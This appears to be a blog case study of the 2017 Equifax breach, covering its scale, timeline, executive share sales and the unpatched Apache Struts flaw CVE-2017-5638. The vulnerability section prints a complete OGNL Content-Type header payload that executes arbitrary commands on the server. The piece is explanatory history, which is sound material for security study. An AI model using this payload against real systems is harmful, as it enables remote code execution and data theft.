Equifax Breach (2017)

In 2017 Equifax were breached, the breach was discovered on July 29^[5] and an announcement was published on Sept 7.^[5] It wasn’t the largest breach of all time, and not even of 2017, but it was big and the data was sensitive. Over the two weeks following the announcement, Equifax stock fell from 142.72 to 92.98 (34.58%)

In regards to large breaches, in the same year Yahoo “upgraded” their previous August 2013 breach to note that it now believed to have affected all 3 billion accounts held on their systems. This figure was up from the original reported 1 billion affected accounts.^[1][2][3] Yahoo noted that the stolen user information may have included names, email addresses, telephone numbers, dates of birth, MD5 hashes of passwords and in some cases encrypted or unencrypted security questions and answers.^[3]

Additionally River City Media suffered a security incident that saw 1.37 billion email/postal addresses leaked. River City Media clarified that full name, IP address and email address was included for every record whilst physical (postal) address was included for “some” accounts.^[4]

These breaches dwarf the “approximately 143 million” U.S. consumers affected which was the initial estimation, later increased to 145.5 million U.S. consumers” affected.^[10] This increase additionally included 694,000 UK^[21] citizens and 8,000 Canadian citizens.^[9]

Initially the attack seemed to have taken place from mid-May and involved names, social security numbers, dates of birth, addresses and in some cases credit card numbers and driving license numbers.^[6] However there was an earlier breach in March which Bloomberg reports was performed by the same intruders,^[7] although Equifax released a statement denying the events were related:^[8]

“The March event reported by Bloomberg is not related to the criminal hacking that was discovered on 29 July. Mandiant has investigated both events and found no evidence that these two separate events or the attackers were related.”

The latter breach was due to an Apache Struts vulnerability now known as CVE-2017-5638 which was publicly announced on 2017-03-06 along with a fix, an exploit was released as early as 2017-03-07^[18] although Equifax did not patch the issue until 2017-07-30.^[11] Putting the time to patch at 146 days.

The breach was detected on July 29th and days later four top managers sold some of their shares in Equifax. The Chief Financial Officer sold 13% of their holdings a $946,374. The President of US Information Solutions sold 9% of their holdings at $584,099. The President of Workforce Solutions sold 4% of their holdings at $250,458. Additionally a Senior VP of Investor Relations also sold shares.^[13]

A special committee set up by Equifax’s board conducted an investigation. That investigation held 62 interviews and reviewed 55,000 documents, which included emails, text messages and phone logs and determined the four had no knowledge of the breach and this was not considered insider trader. Additionally they had all gained pre-clearance to sell the stock.^[14]

However the US Justice Department are reportedly investigating the share sales^[16] and the Federal Trade Commission is investigating the breach.^[17]
Oh, and the CEO blamed an individual person for causing the data breach by failing to communicate the requirement to apply the patch.^[15][20] However the CEO retired following the breach. He received a payout of $90,000,000. The Chief Information Officer and Chief Security Officer also both retired following the breach.

On a funny angle, during the period following the announcement of the breach, Equifax official twitter accounts accidentally (and repeatedly) misdirected users to a phishing site instead of their own information site. They intended to send them to equifaxsecurity2017.com but instead sent them to a fake site hosted by a security researcher at securityequifax2017.com.^[19][23]

Finally, following their second breach the Equifax Credit Assistance site was found to be serving malicious software posing as a Adobe Flash update. They reportedly corrected this issue on October 12.^[22]

Following the breach Equifax CEO, Richard Smith, testified in front of a US House subcommittee on consumer protection and detailed some of the challenges they faced following the breach – such as the fact that Hurricane Irma took down two of their larger call centres after the breach was announced.^[26]

Timeline

Vulnerability Details

The vulnerability exploited was CVE-2017-5638 which is an arbitrary command execution vulnerability within Apache Struts. Several exploits have been written with an initial proof-of-concept being released within 24 hours of the patch release day.

The vulnerability works by specifying a crafted Content-Type, Content-Disposition, or Content-Length HTTP header within a HTTP request. The headers can be crafted to include an OGNL expression which can cause arbitrary command execution. Such as:

Content-Type: %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’CMD HERE’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Read More

• TalkTalk Breach (2015)
• Target Breach (2013)

References

1. https://www.theverge.com/2017/10/3/16414306/yahoo-security-data-breach-3-billion-verizon
2. https://www.oath.com/press/yahoo-provides-notice-to-additional-users-affected-by-previously/
3. https://help.yahoo.com/kb/account/SLN28451.html?impressions=true
4. https://www.theregister.co.uk/2017/03/07/rcm_email_megaleak/
5. https://investor.equifax.com/news-and-events/news/2017/09-07-2017-213000628
6. https://www.usatoday.com/story/money/2017/09/08/equifax-shares-tumble-after-data-hack-announcement/645146001/
7. https://www.bloomberg.com/news/articles/2017-09-18/equifax-is-said-to-suffer-a-hack-earlier-than-the-date-disclosed
8. https://www.theguardian.com/technology/2017/sep/19/equifax-credit-firm-march-breach-massive-may-hack-customers4. https://www.theregister.co.uk/2017/03/07/rcm_email_megaleak/
9. http://www.bbc.co.uk/news/business-41575188
10. https://www.equifaxsecurity2017.com/frequently-asked-questions/
11. https://securestrategy.co.nz/2017/10/01/what-equifax-did-wrong/
12. https://arstechnica.co.uk/information-technology/2017/09/equifax-hack-started-4-months-before-it-was-detected/?comments=1&post=34027857
13. https://www.theregister.co.uk/2017/11/03/equifax_share_trade_investigation/
14. https://uk.reuters.com/article/uk-equifax-cyber/equifax-clears-executives-who-sold-shares-after-hack-idUKKBN1D31GV
15. https://www.theverge.com/2017/10/3/16410806/equifax-ceo-blame-breach-patch-congress-testimony
16. http://uk.businessinsider.com/equifax-hack-justice-department-investigation-of-alleged-insider-trading-2017-9
17. https://www.theverge.com/2017/9/14/16306872/equifax-breach-ftc-probe-lawsuit-vulnerability
18. https://www.exploit-db.com/exploits/41570/
19. http://www.securityweek.com/equifax-sent-breach-victims-fake-website
20. http://money.cnn.com/2017/09/18/technology/business/equifax-breach-march-earlier/index.html
21. https://www.equifax.co.uk/about-equifax/press-releases/en_gb/-/blogs/equifax-ltd-uk-update-regarding-the-ongoing-investigation-into-us-cyber-security-incident
22. https://krebsonsecurity.com/2017/10/equifax-credit-assistance-site-served-spyware/
23. https://twitter.com/AskEquifax/status/906237250438131716
24. https://www.theguardian.com/business/2018/mar/14/equifax-insider-trading-data-breach-jun-ying-charged
25. https://www.reuters.com/article/us-equifax-cyber-insidertrading/former-equifax-employee-pleads-guilty-to-insider-trading-idUSKBN1KD2E7
26. https://www.theregister.co.uk/2017/10/04/sole_security_worker_at_fault_for_equifax_fail_says_former_ceo/